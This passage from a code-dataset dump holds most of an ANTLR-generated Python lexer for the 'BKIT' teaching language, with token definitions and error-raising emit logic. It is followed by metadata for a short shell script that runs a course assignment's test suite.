buf.write(\"O\\2\\u00ac\\4\\3\\2\\2\\2\\u00ad\\u00b2\\5\\23\\n\\2\\u00ae\\u00b1\\5\")\n buf.write(\"\\23\\n\\2\\u00af\\u00b1\\5\\27\\f\\2\\u00b0\\u00ae\\3\\2\\2\\2\\u00b0\")\n buf.write(\"\\u00af\\3\\2\\2\\2\\u00b1\\u00b4\\3\\2\\2\\2\\u00b2\\u00b0\\3\\2\\2\\2\")\n buf.write(\"\\u00b2\\u00b3\\3\\2\\2\\2\\u00b3\\6\\3\\2\\2\\2\\u00b4\\u00b2\\3\\2\\2\")\n buf.write(\"\\2\\u00b5\\u00b9\\7$\\2\\2\\u00b6\\u00b8\\5\\'\\24\\2\\u00b7\\u00b6\")\n buf.write(\"\\3\\2\\2\\2\\u00b8\\u00bb\\3\\2\\2\\2\\u00b9\\u00b7\\3\\2\\2\\2\\u00b9\")\n 
buf.write(\"\\u00ba\\3\\2\\2\\2\\u00ba\\u00bc\\3\\2\\2\\2\\u00bb\\u00b9\\3\\2\\2\\2\")\n buf.write(\"\\u00bc\\u00bd\\5!\\21\\2\\u00bd\\b\\3\\2\\2\\2\\u00be\\u00c2\\7$\\2\")\n buf.write(\"\\2\\u00bf\\u00c1\\5\\'\\24\\2\\u00c0\\u00bf\\3\\2\\2\\2\\u00c1\\u00c4\")\n buf.write(\"\\3\\2\\2\\2\\u00c2\\u00c0\\3\\2\\2\\2\\u00c2\\u00c3\\3\\2\\2\\2\\u00c3\")\n buf.write(\"\\u00c6\\3\\2\\2\\2\\u00c4\\u00c2\\3\\2\\2\\2\\u00c5\\u00c7\\t\\2\\2\\2\")\n buf.write(\"\\u00c6\\u00c5\\3\\2\\2\\2\\u00c7\\u00c8\\3\\2\\2\\2\\u00c8\\u00c9\\b\")\n buf.write(\"\\5\\2\\2\\u00c9\\n\\3\\2\\2\\2\\u00ca\\u00cb\\7,\\2\\2\\u00cb\\u00cc\")\n buf.write(\"\\7,\\2\\2\\u00cc\\u00d0\\3\\2\\2\\2\\u00cd\\u00cf\\13\\2\\2\\2\\u00ce\")\n buf.write(\"\\u00cd\\3\\2\\2\\2\\u00cf\\u00d2\\3\\2\\2\\2\\u00d0\\u00d1\\3\\2\\2\\2\")\n buf.write(\"\\u00d0\\u00ce\\3\\2\\2\\2\\u00d1\\u00d3\\3\\2\\2\\2\\u00d2\\u00d0\\3\")\n buf.write(\"\\2\\2\\2\\u00d3\\u00d4\\7,\\2\\2\\u00d4\\u00d5\\7,\\2\\2\\u00d5\\u00d6\")\n buf.write(\"\\3\\2\\2\\2\\u00d6\\u00d7\\b\\6\\3\\2\\u00d7\\f\\3\\2\\2\\2\\u00d8\\u00d9\")\n buf.write(\"\\7,\\2\\2\\u00d9\\u00da\\7,\\2\\2\\u00da\\u00de\\3\\2\\2\\2\\u00db\\u00dd\")\n buf.write(\"\\13\\2\\2\\2\\u00dc\\u00db\\3\\2\\2\\2\\u00dd\\u00e0\\3\\2\\2\\2\\u00de\")\n buf.write(\"\\u00df\\3\\2\\2\\2\\u00de\\u00dc\\3\\2\\2\\2\\u00df\\u00e1\\3\\2\\2\\2\")\n buf.write(\"\\u00e0\\u00de\\3\\2\\2\\2\\u00e1\\u00e2\\7\\2\\2\\3\\u00e2\\16\\3\\2\")\n buf.write(\"\\2\\2\\u00e3\\u00e4\\t\\3\\2\\2\\u00e4\\20\\3\\2\\2\\2\\u00e5\\u00e7\")\n buf.write(\"\\t\\4\\2\\2\\u00e6\\u00e5\\3\\2\\2\\2\\u00e7\\u00e8\\3\\2\\2\\2\\u00e8\")\n buf.write(\"\\u00e6\\3\\2\\2\\2\\u00e8\\u00e9\\3\\2\\2\\2\\u00e9\\u00ea\\3\\2\\2\\2\")\n buf.write(\"\\u00ea\\u00eb\\b\\t\\3\\2\\u00eb\\22\\3\\2\\2\\2\\u00ec\\u00ed\\t\\5\")\n buf.write(\"\\2\\2\\u00ed\\24\\3\\2\\2\\2\\u00ee\\u00ef\\t\\6\\2\\2\\u00ef\\26\\3\\2\")\n buf.write(\"\\2\\2\\u00f0\\u00f1\\t\\7\\2\\2\\u00f1\\30\\3\\2\\2\\2\\u00f2\\u00f5\")\n 
buf.write(\"\\5\\23\\n\\2\\u00f3\\u00f5\\5\\25\\13\\2\\u00f4\\u00f2\\3\\2\\2\\2\\u00f4\")\n buf.write(\"\\u00f3\\3\\2\\2\\2\\u00f5\\32\\3\\2\\2\\2\\u00f6\\u00f8\\t\\b\\2\\2\\u00f7\")\n buf.write(\"\\u00f9\\5i\\65\\2\\u00f8\\u00f7\\3\\2\\2\\2\\u00f8\\u00f9\\3\\2\\2\\2\")\n buf.write(\"\\u00f9\\u00fb\\3\\2\\2\\2\\u00fa\\u00fc\\5\\27\\f\\2\\u00fb\\u00fa\")\n buf.write(\"\\3\\2\\2\\2\\u00fc\\u00fd\\3\\2\\2\\2\\u00fd\\u00fb\\3\\2\\2\\2\\u00fd\")\n buf.write(\"\\u00fe\\3\\2\\2\\2\\u00fe\\34\\3\\2\\2\\2\\u00ff\\u0103\\t\\t\\2\\2\\u0100\")\n buf.write(\"\\u0102\\5\\27\\f\\2\\u0101\\u0100\\3\\2\\2\\2\\u0102\\u0105\\3\\2\\2\")\n buf.write(\"\\2\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\\u0104\\36\\3\")\n buf.write(\"\\2\\2\\2\\u0105\\u0103\\3\\2\\2\\2\\u0106\\u0108\\5\\27\\f\\2\\u0107\")\n buf.write(\"\\u0106\\3\\2\\2\\2\\u0108\\u0109\\3\\2\\2\\2\\u0109\\u0107\\3\\2\\2\\2\")\n buf.write(\"\\u0109\\u010a\\3\\2\\2\\2\\u010a\\u0110\\3\\2\\2\\2\\u010b\\u010d\\5\")\n buf.write(\"\\35\\17\\2\\u010c\\u010e\\5\\33\\16\\2\\u010d\\u010c\\3\\2\\2\\2\\u010d\")\n buf.write(\"\\u010e\\3\\2\\2\\2\\u010e\\u0111\\3\\2\\2\\2\\u010f\\u0111\\5\\33\\16\")\n buf.write(\"\\2\\u0110\\u010b\\3\\2\\2\\2\\u0110\\u010f\\3\\2\\2\\2\\u0111 \\3\\2\")\n buf.write(\"\\2\\2\\u0112\\u0113\\7^\\2\\2\\u0113\\u0114\\n\\n\\2\\2\\u0114\\\"\\3\")\n buf.write(\"\\2\\2\\2\\u0115\\u0116\\7^\\2\\2\\u0116\\u0117\\t\\n\\2\\2\\u0117$\\3\")\n buf.write(\"\\2\\2\\2\\u0118\\u0119\\7)\\2\\2\\u0119\\u011a\\7$\\2\\2\\u011a&\\3\")\n buf.write(\"\\2\\2\\2\\u011b\\u011f\\n\\13\\2\\2\\u011c\\u011f\\5#\\22\\2\\u011d\")\n buf.write(\"\\u011f\\5%\\23\\2\\u011e\\u011b\\3\\2\\2\\2\\u011e\\u011c\\3\\2\\2\\2\")\n buf.write(\"\\u011e\\u011d\\3\\2\\2\\2\\u011f(\\3\\2\\2\\2\\u0120\\u0121\\t\\f\\2\")\n buf.write(\"\\2\\u0121*\\3\\2\\2\\2\\u0122\\u0123\\t\\r\\2\\2\\u0123,\\3\\2\\2\\2\\u0124\")\n buf.write(\"\\u0125\\7\\62\\2\\2\\u0125\\u0129\\7z\\2\\2\\u0126\\u0127\\7\\62\\2\")\n 
buf.write(\"\\2\\u0127\\u0129\\7Z\\2\\2\\u0128\\u0124\\3\\2\\2\\2\\u0128\\u0126\")\n buf.write(\"\\3\\2\\2\\2\\u0129\\u012b\\3\\2\\2\\2\\u012a\\u012c\\5)\\25\\2\\u012b\")\n buf.write(\"\\u012a\\3\\2\\2\\2\\u012c\\u012d\\3\\2\\2\\2\\u012d\\u012b\\3\\2\\2\\2\")\n buf.write(\"\\u012d\\u012e\\3\\2\\2\\2\\u012e.\\3\\2\\2\\2\\u012f\\u0131\\5\\27\\f\")\n buf.write(\"\\2\\u0130\\u012f\\3\\2\\2\\2\\u0131\\u0132\\3\\2\\2\\2\\u0132\\u0130\")\n buf.write(\"\\3\\2\\2\\2\\u0132\\u0133\\3\\2\\2\\2\\u0133\\60\\3\\2\\2\\2\\u0134\\u0135\")\n buf.write(\"\\7\\62\\2\\2\\u0135\\u0139\\7q\\2\\2\\u0136\\u0137\\7\\62\\2\\2\\u0137\")\n buf.write(\"\\u0139\\7Q\\2\\2\\u0138\\u0134\\3\\2\\2\\2\\u0138\\u0136\\3\\2\\2\\2\")\n buf.write(\"\\u0139\\u013b\\3\\2\\2\\2\\u013a\\u013c\\5+\\26\\2\\u013b\\u013a\\3\")\n buf.write(\"\\2\\2\\2\\u013c\\u013d\\3\\2\\2\\2\\u013d\\u013b\\3\\2\\2\\2\\u013d\\u013e\")\n buf.write(\"\\3\\2\\2\\2\\u013e\\62\\3\\2\\2\\2\\u013f\\u0143\\5/\\30\\2\\u0140\\u0143\")\n buf.write(\"\\5-\\27\\2\\u0141\\u0143\\5\\61\\31\\2\\u0142\\u013f\\3\\2\\2\\2\\u0142\")\n buf.write(\"\\u0140\\3\\2\\2\\2\\u0142\\u0141\\3\\2\\2\\2\\u0143\\64\\3\\2\\2\\2\\u0144\")\n buf.write(\"\\u0145\\5\\37\\20\\2\\u0145\\66\\3\\2\\2\\2\\u0146\\u0149\\5_\\60\\2\")\n buf.write(\"\\u0147\\u0149\\5a\\61\\2\\u0148\\u0146\\3\\2\\2\\2\\u0148\\u0147\\3\")\n buf.write(\"\\2\\2\\2\\u01498\\3\\2\\2\\2\\u014a\\u014e\\7$\\2\\2\\u014b\\u014d\\5\")\n buf.write(\"\\'\\24\\2\\u014c\\u014b\\3\\2\\2\\2\\u014d\\u0150\\3\\2\\2\\2\\u014e\")\n buf.write(\"\\u014c\\3\\2\\2\\2\\u014e\\u014f\\3\\2\\2\\2\\u014f\\u0151\\3\\2\\2\\2\")\n buf.write(\"\\u0150\\u014e\\3\\2\\2\\2\\u0151\\u0152\\7$\\2\\2\\u0152\\u0153\\b\")\n buf.write(\"\\35\\4\\2\\u0153:\\3\\2\\2\\2\\u0154\\u0155\\7D\\2\\2\\u0155\\u0156\")\n buf.write(\"\\7q\\2\\2\\u0156\\u0157\\7f\\2\\2\\u0157\\u0158\\7{\\2\\2\\u0158<\\3\")\n buf.write(\"\\2\\2\\2\\u0159\\u015a\\7D\\2\\2\\u015a\\u015b\\7t\\2\\2\\u015b\\u015c\")\n 
buf.write(\"\\7g\\2\\2\\u015c\\u015d\\7c\\2\\2\\u015d\\u015e\\7m\\2\\2\\u015e>\\3\")\n buf.write(\"\\2\\2\\2\\u015f\\u0160\\7E\\2\\2\\u0160\\u0161\\7q\\2\\2\\u0161\\u0162\")\n buf.write(\"\\7p\\2\\2\\u0162\\u0163\\7v\\2\\2\\u0163\\u0164\\7k\\2\\2\\u0164\\u0165\")\n buf.write(\"\\7p\\2\\2\\u0165\\u0166\\7w\\2\\2\\u0166\\u0167\\7g\\2\\2\\u0167@\\3\")\n buf.write(\"\\2\\2\\2\\u0168\\u0169\\7F\\2\\2\\u0169\\u016a\\7q\\2\\2\\u016aB\\3\")\n buf.write(\"\\2\\2\\2\\u016b\\u016c\\7G\\2\\2\\u016c\\u016d\\7n\\2\\2\\u016d\\u016e\")\n buf.write(\"\\7u\\2\\2\\u016e\\u016f\\7g\\2\\2\\u016fD\\3\\2\\2\\2\\u0170\\u0171\")\n buf.write(\"\\7G\\2\\2\\u0171\\u0172\\7n\\2\\2\\u0172\\u0173\\7U\\2\\2\\u0173\\u0174\")\n buf.write(\"\\7g\\2\\2\\u0174\\u0175\\7n\\2\\2\\u0175\\u0176\\7h\\2\\2\\u0176F\\3\")\n buf.write(\"\\2\\2\\2\\u0177\\u0178\\7G\\2\\2\\u0178\\u0179\\7n\\2\\2\\u0179\\u017a\")\n buf.write(\"\\7u\\2\\2\\u017a\\u017b\\7g\\2\\2\\u017b\\u017c\\7K\\2\\2\\u017c\\u017d\")\n buf.write(\"\\7h\\2\\2\\u017dH\\3\\2\\2\\2\\u017e\\u017f\\7G\\2\\2\\u017f\\u0180\")\n buf.write(\"\\7p\\2\\2\\u0180\\u0181\\7f\\2\\2\\u0181\\u0182\\7K\\2\\2\\u0182\\u0183\")\n buf.write(\"\\7h\\2\\2\\u0183J\\3\\2\\2\\2\\u0184\\u0185\\7G\\2\\2\\u0185\\u0186\")\n buf.write(\"\\7p\\2\\2\\u0186\\u0187\\7f\\2\\2\\u0187\\u0188\\7H\\2\\2\\u0188\\u0189\")\n buf.write(\"\\7q\\2\\2\\u0189\\u018a\\7t\\2\\2\\u018aL\\3\\2\\2\\2\\u018b\\u018c\")\n buf.write(\"\\7G\\2\\2\\u018c\\u018d\\7p\\2\\2\\u018d\\u018e\\7f\\2\\2\\u018e\\u018f\")\n buf.write(\"\\7Y\\2\\2\\u018f\\u0190\\7j\\2\\2\\u0190\\u0191\\7k\\2\\2\\u0191\\u0192\")\n buf.write(\"\\7n\\2\\2\\u0192\\u0193\\7g\\2\\2\\u0193N\\3\\2\\2\\2\\u0194\\u0195\")\n buf.write(\"\\7H\\2\\2\\u0195\\u0196\\7q\\2\\2\\u0196\\u0197\\7t\\2\\2\\u0197P\\3\")\n buf.write(\"\\2\\2\\2\\u0198\\u0199\\7H\\2\\2\\u0199\\u019a\\7w\\2\\2\\u019a\\u019b\")\n buf.write(\"\\7p\\2\\2\\u019b\\u019c\\7e\\2\\2\\u019c\\u019d\\7v\\2\\2\\u019d\\u019e\")\n 
buf.write(\"\\7k\\2\\2\\u019e\\u019f\\7q\\2\\2\\u019f\\u01a0\\7p\\2\\2\\u01a0R\\3\")\n buf.write(\"\\2\\2\\2\\u01a1\\u01a2\\7K\\2\\2\\u01a2\\u01a3\\7h\\2\\2\\u01a3T\\3\")\n buf.write(\"\\2\\2\\2\\u01a4\\u01a5\\7R\\2\\2\\u01a5\\u01a6\\7c\\2\\2\\u01a6\\u01a7\")\n buf.write(\"\\7t\\2\\2\\u01a7\\u01a8\\7c\\2\\2\\u01a8\\u01a9\\7o\\2\\2\\u01a9\\u01aa\")\n buf.write(\"\\7g\\2\\2\\u01aa\\u01ab\\7v\\2\\2\\u01ab\\u01ac\\7g\\2\\2\\u01ac\\u01ad\")\n buf.write(\"\\7t\\2\\2\\u01adV\\3\\2\\2\\2\\u01ae\\u01af\\7T\\2\\2\\u01af\\u01b0\")\n buf.write(\"\\7g\\2\\2\\u01b0\\u01b1\\7v\\2\\2\\u01b1\\u01b2\\7w\\2\\2\\u01b2\\u01b3\")\n buf.write(\"\\7t\\2\\2\\u01b3\\u01b4\\7p\\2\\2\\u01b4X\\3\\2\\2\\2\\u01b5\\u01b6\")\n buf.write(\"\\7V\\2\\2\\u01b6\\u01b7\\7j\\2\\2\\u01b7\\u01b8\\7g\\2\\2\\u01b8\\u01b9\")\n buf.write(\"\\7p\\2\\2\\u01b9Z\\3\\2\\2\\2\\u01ba\\u01bb\\7X\\2\\2\\u01bb\\u01bc\")\n buf.write(\"\\7c\\2\\2\\u01bc\\u01bd\\7t\\2\\2\\u01bd\\\\\\3\\2\\2\\2\\u01be\\u01bf\")\n buf.write(\"\\7Y\\2\\2\\u01bf\\u01c0\\7j\\2\\2\\u01c0\\u01c1\\7k\\2\\2\\u01c1\\u01c2\")\n buf.write(\"\\7n\\2\\2\\u01c2\\u01c3\\7g\\2\\2\\u01c3^\\3\\2\\2\\2\\u01c4\\u01c5\")\n buf.write(\"\\7V\\2\\2\\u01c5\\u01c6\\7t\\2\\2\\u01c6\\u01c7\\7w\\2\\2\\u01c7\\u01c8\")\n buf.write(\"\\7g\\2\\2\\u01c8`\\3\\2\\2\\2\\u01c9\\u01ca\\7H\\2\\2\\u01ca\\u01cb\")\n buf.write(\"\\7c\\2\\2\\u01cb\\u01cc\\7n\\2\\2\\u01cc\\u01cd\\7u\\2\\2\\u01cd\\u01ce\")\n buf.write(\"\\7g\\2\\2\\u01ceb\\3\\2\\2\\2\\u01cf\\u01d0\\7G\\2\\2\\u01d0\\u01d1\")\n buf.write(\"\\7p\\2\\2\\u01d1\\u01d2\\7f\\2\\2\\u01d2\\u01d3\\7F\\2\\2\\u01d3\\u01d4\")\n buf.write(\"\\7q\\2\\2\\u01d4d\\3\\2\\2\\2\\u01d5\\u01d6\\7-\\2\\2\\u01d6f\\3\\2\\2\")\n buf.write(\"\\2\\u01d7\\u01d8\\7-\\2\\2\\u01d8\\u01d9\\7\\60\\2\\2\\u01d9h\\3\\2\")\n buf.write(\"\\2\\2\\u01da\\u01db\\7/\\2\\2\\u01dbj\\3\\2\\2\\2\\u01dc\\u01dd\\7/\")\n buf.write(\"\\2\\2\\u01dd\\u01de\\7\\60\\2\\2\\u01del\\3\\2\\2\\2\\u01df\\u01e0\\7\")\n 
buf.write(\",\\2\\2\\u01e0n\\3\\2\\2\\2\\u01e1\\u01e2\\7,\\2\\2\\u01e2\\u01e3\\7\")\n buf.write(\"\\60\\2\\2\\u01e3p\\3\\2\\2\\2\\u01e4\\u01e5\\7^\\2\\2\\u01e5r\\3\\2\\2\")\n buf.write(\"\\2\\u01e6\\u01e7\\7^\\2\\2\\u01e7\\u01e8\\7\\60\\2\\2\\u01e8t\\3\\2\")\n buf.write(\"\\2\\2\\u01e9\\u01ea\\7\\'\\2\\2\\u01eav\\3\\2\\2\\2\\u01eb\\u01ec\\7\")\n buf.write(\"#\\2\\2\\u01ecx\\3\\2\\2\\2\\u01ed\\u01ee\\7(\\2\\2\\u01ee\\u01ef\\7\")\n buf.write(\"(\\2\\2\\u01efz\\3\\2\\2\\2\\u01f0\\u01f1\\7~\\2\\2\\u01f1\\u01f2\\7\")\n buf.write(\"~\\2\\2\\u01f2|\\3\\2\\2\\2\\u01f3\\u01f4\\7?\\2\\2\\u01f4\\u01f5\\7\")\n buf.write(\"?\\2\\2\\u01f5~\\3\\2\\2\\2\\u01f6\\u01f7\\7#\\2\\2\\u01f7\\u01f8\\7\")\n buf.write(\"?\\2\\2\\u01f8\\u0080\\3\\2\\2\\2\\u01f9\\u01fa\\7>\\2\\2\\u01fa\\u0082\")\n buf.write(\"\\3\\2\\2\\2\\u01fb\\u01fc\\7@\\2\\2\\u01fc\\u0084\\3\\2\\2\\2\\u01fd\")\n buf.write(\"\\u01fe\\7>\\2\\2\\u01fe\\u01ff\\7?\\2\\2\\u01ff\\u0086\\3\\2\\2\\2\\u0200\")\n buf.write(\"\\u0201\\7@\\2\\2\\u0201\\u0202\\7?\\2\\2\\u0202\\u0088\\3\\2\\2\\2\\u0203\")\n buf.write(\"\\u0204\\7?\\2\\2\\u0204\\u0205\\7^\\2\\2\\u0205\\u0206\\7?\\2\\2\\u0206\")\n buf.write(\"\\u008a\\3\\2\\2\\2\\u0207\\u0208\\7>\\2\\2\\u0208\\u0209\\7\\60\\2\\2\")\n buf.write(\"\\u0209\\u008c\\3\\2\\2\\2\\u020a\\u020b\\7@\\2\\2\\u020b\\u020c\\7\")\n buf.write(\"\\60\\2\\2\\u020c\\u008e\\3\\2\\2\\2\\u020d\\u020e\\7>\\2\\2\\u020e\\u020f\")\n buf.write(\"\\7?\\2\\2\\u020f\\u0210\\7\\60\\2\\2\\u0210\\u0090\\3\\2\\2\\2\\u0211\")\n buf.write(\"\\u0212\\7@\\2\\2\\u0212\\u0213\\7?\\2\\2\\u0213\\u0214\\7\\60\\2\\2\")\n buf.write(\"\\u0214\\u0092\\3\\2\\2\\2\\u0215\\u0216\\7*\\2\\2\\u0216\\u0094\\3\")\n buf.write(\"\\2\\2\\2\\u0217\\u0218\\7+\\2\\2\\u0218\\u0096\\3\\2\\2\\2\\u0219\\u021a\")\n buf.write(\"\\7]\\2\\2\\u021a\\u0098\\3\\2\\2\\2\\u021b\\u021c\\7_\\2\\2\\u021c\\u009a\")\n buf.write(\"\\3\\2\\2\\2\\u021d\\u021e\\7}\\2\\2\\u021e\\u009c\\3\\2\\2\\2\\u021f\")\n 
buf.write(\"\\u0220\\7\\177\\2\\2\\u0220\\u009e\\3\\2\\2\\2\\u0221\\u0222\\7<\\2\")\n buf.write(\"\\2\\u0222\\u00a0\\3\\2\\2\\2\\u0223\\u0224\\7\\60\\2\\2\\u0224\\u00a2\")\n buf.write(\"\\3\\2\\2\\2\\u0225\\u0226\\7=\\2\\2\\u0226\\u00a4\\3\\2\\2\\2\\u0227\")\n buf.write(\"\\u0228\\7.\\2\\2\\u0228\\u00a6\\3\\2\\2\\2\\u0229\\u022a\\7?\\2\\2\\u022a\")\n buf.write(\"\\u00a8\\3\\2\\2\\2\\33\\2\\u00b0\\u00b2\\u00b9\\u00c2\\u00c6\\u00d0\")\n buf.write(\"\\u00de\\u00e8\\u00f4\\u00f8\\u00fd\\u0103\\u0109\\u010d\\u0110\")\n buf.write(\"\\u011e\\u0128\\u012d\\u0132\\u0138\\u013d\\u0142\\u0148\\u014e\")\n buf.write(\"\\5\\3\\5\\2\\b\\2\\2\\3\\35\\3\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n INT_ARRAY = 1\n ID = 2\n ILLEGAL_ESCAPE = 3\n UNCLOSE_STRING = 4\n COMMENT = 5\n UNTERMINATED_COMMENT = 6\n ERROR_CHAR = 7\n WS = 8\n Integer_literal = 9\n Float_literal = 10\n Boolean_literal = 11\n String_literal = 12\n BODY = 13\n BREAK = 14\n CONTINUE = 15\n DO = 16\n ELSE = 17\n ELSELF = 18\n ELSEIF = 19\n ENDBODY = 20\n ENDFOR = 21\n ENDWHILE = 22\n FOR = 23\n FUNCTION = 24\n IF = 25\n PARAMETER = 26\n RETURN = 27\n THEN = 28\n VAR = 29\n WHILE = 30\n TRUE = 31\n FALSE = 32\n ENDDO = 33\n PLUS_INT = 34\n PLUS_FLOAT = 35\n MINUS_INT = 36\n MINUS_FLOAT = 37\n STAR_INT = 38\n STAR_FLOAT = 39\n DIV_INT = 40\n DIV_FLOAT = 41\n MOD = 42\n NOT = 43\n AND = 44\n OR = 45\n EQUAL = 46\n NOT_EQUAL_INT = 47\n LESS_INT = 48\n GREATER_INT = 49\n LESS_OR_EQUAL_INT = 50\n GREATER_OR_EQUAL_INT = 51\n NOT_EQUAL_FLOAT = 52\n LESS_FLOAT = 53\n GREATER_FLOAT = 54\n LESS_OR_EQUAL_FLOAT = 55\n GREATER_OR_EQUAL_FLOAT = 56\n LEFT_PAREN = 57\n RIGHT_PARENT = 58\n LEFT_BRACKET = 59\n RIGHT_BRACKET = 60\n LEFT_BRACE = 61\n RIGHT_BRACE = 62\n COLON = 63\n DOT = 64\n SEMI = 65\n COMMA = 66\n ASSIGN = 67\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" 
]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n \"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"INT_ARRAY\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \n \"Float_literal\", \"Boolean_literal\", \"String_literal\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\" ]\n\n ruleNames = [ \"INT_ARRAY\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \n \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"LETTER\", \n \"SCIENTIFIC\", 
\"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \"ILL_ESC_SEQUENCE\", \n \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \"STRING_CHAR\", \n \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \"DECIMAL\", \n \"OCTAL\", \"Integer_literal\", \"Float_literal\", \"Boolean_literal\", \n \"String_literal\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \n \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \n \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \n \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \n \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \n \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \n \"LEFT_PAREN\", \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[3] = self.UNCLOSE_STRING_action \n actions[27] = self.String_literal_action \n self._actions 
= actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = str(self.text);\n self.text = y[1:]\n \n \n\n def String_literal_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n\n" }, { "alpha_fraction": 0.6461538672447205, "alphanum_fraction": 0.6461538672447205, "avg_line_length": 31.5, "blob_id": "513a401a825a3b4a0933706fc902e7a6bb14d7cc", "content_id": "95f0549360c0db606964088c8c989e352e4a4920", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 65, "license_type": "no_license", "max_line_length": 45, "num_lines": 2, "path": "/Assignments/assignment3/src/run_test.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "python ./run.py test CheckSuite > ./check.log\n./log.sh > ./log.m\n" }, { "alpha_fraction": 0.30581867694854736, "alphanum_fraction": 0.311231404542923, "avg_line_length": 27.461538314819336, "blob_id": "ad95e804b18dd0bd8e4775de7b2a032889092bde", "content_id": "0c4e0b490c6013e9dba7cf5a3d92adaa0d46a924", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 739, "license_type": "no_license", "max_line_length": 51, "num_lines": 26, "path": "/Assignments/assignment2/src1.0/log.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": 